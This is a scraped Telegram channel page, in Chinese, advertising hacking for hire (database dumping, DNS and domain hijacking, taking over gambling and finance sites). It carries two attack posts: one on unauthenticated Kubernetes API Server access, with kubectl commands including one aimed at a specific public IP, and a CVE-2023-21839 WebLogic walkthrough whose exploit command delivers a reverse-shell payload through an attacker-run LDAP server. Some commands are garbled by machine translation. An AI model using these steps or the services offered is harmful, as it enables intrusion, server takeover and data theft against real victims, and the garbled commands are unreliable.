黑客渗透 金融劫持 BC域名跳转
17.7K subscribers
1.79K photos
19 videos
2 files
162 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
K8s的API Server默认的服务端口是8080(不安全端口)和6443(安全端口)。 8080端口提供HTTP服务,无认证授权机制;6443端口提供HTTPS服务,支持认证(使用token或客户端证书进行认证)和授权服务。默认情况下,8080 端口未启用,6443 端口已启用。这两个端口的开放取决于/etc/kubernetes/manifests/kube-apiserver.yaml 配置文件
如果目标K8s的8080端口开放,由于没有认证授权机制,会出现非法访问的情况。
如果目标K8s的6443端口开放,如果配置不正确,也可能导致越权访问。
### 漏洞重现
#### 1.端口8080
````
默认情况下8080端口是关闭的,需要手动打开。
vim /etc/kubernetes/manifests/kube-apiserver.yaml
````
````
重启k8s
systemctl 重新启动kubectl
#### 2.端口6443
如果配置不当,将“system:anonymous”用户绑定到“cluster-admin”用户组将允许匿名用户以管理员权限访问端口6443。
````
执行以下命令将“system:anonymous”用户绑定到“cluster-admin”用户组
kubectl 创建集群角色绑定cluster-system-anonymous --clusterrole=cluster-admin --user=system:anonymous
``
了解这种未经授权的访问有什么好处呢?或者说我们应该如何使用它?
使用方法如下:
我们可以使用任何安装了kubectl 的机器。简单来说,知道API服务器没有被授权,我们其实可以使用kubectl来执行命令:
````
查看集群信息
kubectl -s http://101.26.108.16:8080 集群信息
正常情况下访问6443端口会提示Forbidden。

渗透爬虫软件 资源采集 劫持域名 提取抓料子 六合·色站·彩票·博彩·金融 接渗透拿站,各大网站数据-拖库-提权联系 域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
漏洞概述 RCE漏洞,该漏洞允许未经身份验证的远程网络访问,并通过T3/IIOP协议损坏WebLogic服务器。成功利用该漏洞可导致Oracle WebLogic服务器被接管,并通过**rmi/ldap**远程协议执行远程命令。当**JDK版本过低**或者本地存在小工具(javaSerializedData)时,可能会导致远程代码执行。 可见,CVE-2023-21839是weblogic中的JNDI注入漏洞。 #2.影响范围 Oracle WebLogic 服务器12.2.1.3.0 Oracle WebLogic 服务器12.2.1.4.0 Oracle WebLogic 服务器14.1.1.0.0 # 3. 使用方法 ## 反弹壳 1、启用http://your-ip:7001/console即可看到登录界面1702443149_6579388d089c73411c3f9.png!small?1702443150354 下载漏洞利用工具 JNDIExploit-1.4-SNAPSHOT.jar 2、启动ladp服务,同时在kali上启动监控:1702443160_6579389833615944c36fe.png!small?1702443161247 使用JNDIExploit在vps上开启ldap协议服务。这里注意端口1389和3456是开放的。 ```` java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14 ``1702443167_6579389f98ae7d95fabb0.png!small?1702443169115 漏洞EXP下载: ```` https://github.com/DXask88MA/Weblogic-CVE-2023-21839 ```` 3.启动EXP(注意:jdk版本仍然需要是较低版本,原来的JDK17不需要卸载,只需下载较低版本的JDK并切换即可) ```` java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap: //192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999 java -jar 目标服务器IP地址:端口ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口 ```` 无明显变化1702443178_657938aadbc16b2a2308f.png!small?1702443179997 4、检查LDAP服务器,成功获取1702443186_657938b2c207489509ffa.png!small?1702443188127 1702443194_657938ba84e2e821bd9f6.png!small?1702443195840 ## DNSlog 流量要点 ```` eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip:7001 ldap://xxxxx

渗透爬虫软件 资源采集 劫持域名 提取抓料子 六合·色站·彩票·博彩·金融 接渗透拿站,各大网站数据-拖库-提权联系 域名劫持 DNS 入侵网站 联系:@hacker_HouZiM